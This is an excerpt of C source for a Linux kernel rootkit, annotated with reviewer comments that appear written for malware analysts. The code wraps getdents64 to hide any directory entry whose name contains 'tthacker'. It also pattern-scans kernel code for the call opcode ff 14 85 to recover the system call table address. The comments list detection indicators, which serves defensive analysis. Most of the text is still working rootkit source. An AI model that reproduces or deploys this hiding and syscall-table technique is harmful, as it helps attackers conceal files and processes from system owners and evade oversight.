_getdents64)(unsigned int, void *, unsigned int);
/*
 * NOTE(review): the line above is the tail of a declaration that begins
 * before this excerpt. Given the call through (*orig_getdents64) further
 * down, it is presumably the saved pointer to the kernel's own getdents64
 * handler -- confirm against the start of the file.
 *
 * Reading guide for analysts: the visible code does two things.
 *   1. hacked_getdents64() wraps the original handler and edits the
 *      returned directory records so that names containing `hide` are not
 *      reported to the caller.
 *   2. get_sys_call_table() pattern-scans machine code starting at
 *      base_system_call to recover the address of the system call table.
 * The code that installs the wrapper is not in this excerpt.
 */

/*
 * Four 16-bit fields, of which only offset_low / offset_high carry a
 * meaningful name. Not referenced anywhere in the visible code.
 * NOTE(review): the layout looks like an x86 interrupt gate descriptor,
 * where the handler address is split into a low and a high half -- confirm
 * at the use site.
 */
struct descriptor_idt
{
    unsigned short offset_low;
    unsigned short ignore1;
    unsigned short ignore2;
    unsigned short offset_high;
};

/*
 * Packed pair of a 16-bit limit and an unsigned long base. Not referenced
 * in the visible code.
 * NOTE(review): presumably the buffer that receives the IDT register
 * contents on 32-bit x86 -- confirm at the use site.
 */
static struct {
    unsigned short limit;
    unsigned long base;
}__attribute__ ((packed)) idt48;

/*
 * Substring that hacked_getdents64() searches for in every directory entry
 * name. The test is strstr(), so any entry whose name merely contains this
 * text is filtered, not only exact matches. The literal is a convenient
 * string to search for when triaging a suspect module.
 */
char *hide="tthacker";

/* None of the next three objects is assigned in the visible code. */
static unsigned int SYS_CALL_TABLE_ADDR;
void **sys_call_table;
/*
 * Start address of the byte scan in get_sys_call_table(). It is stored in an
 * int and cast to a pointer there, which only round-trips where a pointer
 * fits in an int -- presumably a 32-bit x86 target; TODO confirm.
 */
int base_system_call;

/*
 * Three-byte pattern that get_sys_call_table() looks for. On 32-bit x86,
 * ff 14 85 followed by a 4-byte displacement encodes an indirect call
 * through a table indexed by eax*4, which is why the 4 bytes after a match
 * are read as a table address.
 */
unsigned char opcode_call[3]={0xff,0x14,0x85};

/*
 * Compare the first three bytes at `source` with opcode_call.
 *
 * Returns 1 when all three bytes are equal, 0 at the first mismatch.
 * The caller must guarantee that source[0..2] is readable.
 */
int match(unsigned char *source)
{
    int i;
    for(i=0;i<3;i++){
        if(source[i] != opcode_call[i])
            return 0;
    }
    return 1;
}

/*
 * Wrapper around the original getdents64 handler that removes records whose
 * d_name contains `hide` from the buffer before returning to the caller.
 *
 * fd, dirp, count: passed unchanged to (*orig_getdents64).
 * Returns the original result when it is <= 0; otherwise the byte count
 * after the edits below.
 *
 * What this means for detection: only the buffer returned by this call is
 * edited; the visible code does not touch the underlying files. A listing
 * obtained through getdents64 can therefore disagree with a view of the same
 * directory obtained another way (for example an offline image of the
 * filesystem), and that disagreement is the signal to look for.
 * NOTE(review): how the wrapper is installed is outside this excerpt;
 * presumably the getdents64 slot of the system call table is overwritten, in
 * which case that slot no longer points into the kernel's own text.
 */
asmlinkage long hacked_getdents64(unsigned int fd, void *dirp, unsigned int count)
{
    int ret;
    int proc = 0; /* only touched by the commented-out check below */
    struct inode *dinode;
    char *ptr = (char *)dirp;
    struct linux_dirent64 *curr;
    struct linux_dirent64 *prev = NULL;

    /* Let the real handler fill dirp; ret is the number of bytes it wrote. */
    ret = (*orig_getdents64)(fd, dirp, count);
    if(ret <= 0)
        return ret;

    /*
     * dinode is assigned here but only used by the disabled check that
     * follows. The pointer chain is followed without any NULL or bounds test.
     * NOTE(review): direct files->fd[] indexing and f_dentry suggest an old
     * kernel API -- confirm which kernel version this was built for.
     */
    dinode = current->files->fd[fd]->f_dentry->d_inode;
    /* Disabled by the author: would have set proc when fd refers to the
       root of procfs. */
    /* if(dinode->i_ino == PROC_ROOT_INO && MAJOR(dinode->i_dev) == proc_major_dev && MINOR(dinode->i_dev) == proc_minor_dev) proc++; */

    /*
     * Walk the variable-length records in [dirp, dirp + ret).
     * NOTE(review): dirp is the caller-supplied syscall argument and is
     * dereferenced directly here, without the kernel's user-copy helpers --
     * confirm how the target kernel treats that.
     */
    while(ptr < (char *)dirp + ret) {
        curr = (struct linux_dirent64 *)ptr;
        if(strstr(curr->d_name,hide)!=NULL ) {
            if(curr == dirp) {
                /*
                 * Matching record is the first one in the buffer: ret is
                 * reduced by its length, memmove is called with
                 * ptr + d_reclen as destination and ptr as source, and the
                 * loop re-tests the same position without advancing.
                 * NOTE(review): as written this path does not simply drop one
                 * record; ret keeps shrinking while the record at ptr still
                 * matches, so a truncated or empty listing, or instability on
                 * the host, is a plausible side effect worth noting as a
                 * behavioural indicator.
                 */
                ret -= curr->d_reclen;
                memmove(ptr + curr->d_reclen, ptr, ret);
                continue;
            }
            else
                /* Fold the matching record into the previous one so that a
                   reader stepping by d_reclen skips over it. */
                prev->d_reclen += curr->d_reclen;
        }
        else
            prev = curr; /* last record that stays visible */
        ptr += curr->d_reclen;
    }
    return ret;
}

/*
 * Scan up to 100 byte offsets from base_system_call for the opcode_call
 * pattern and, on a match, read the following 4 bytes as the address of the
 * system call table.
 *
 * The address is logged with printk at KERN_ALERT, so the text
 * "sys_call_tabl's address is 0x..." in the kernel log is an indicator that
 * this routine ran. The value is returned through an int, so an address
 * above INT_MAX is converted on return.
 *
 * NOTE(review): the rest of this function, including what it returns when
 * nothing matches, lies beyond the end of this excerpt; `j` is not used in
 * the visible part.
 */
int get_sys_call_table(void)
{
    int i,j;
    unsigned char *ins=(unsigned char *)base_system_call;
    unsigned int sct;
    for(i=0;i<100;i++){
        /* Cheap first-byte test before the full three-byte compare. */
        if(ins[i]==opcode_call[0]){
            if(match(ins+i)){
                /* The 32-bit operand that follows the three opcode bytes. */
                sct=*((unsigned int *)(ins+3+i));
                printk(KERN_ALERT "sys_call_tabl's address is 0x%X\n",sct);
                return sct; |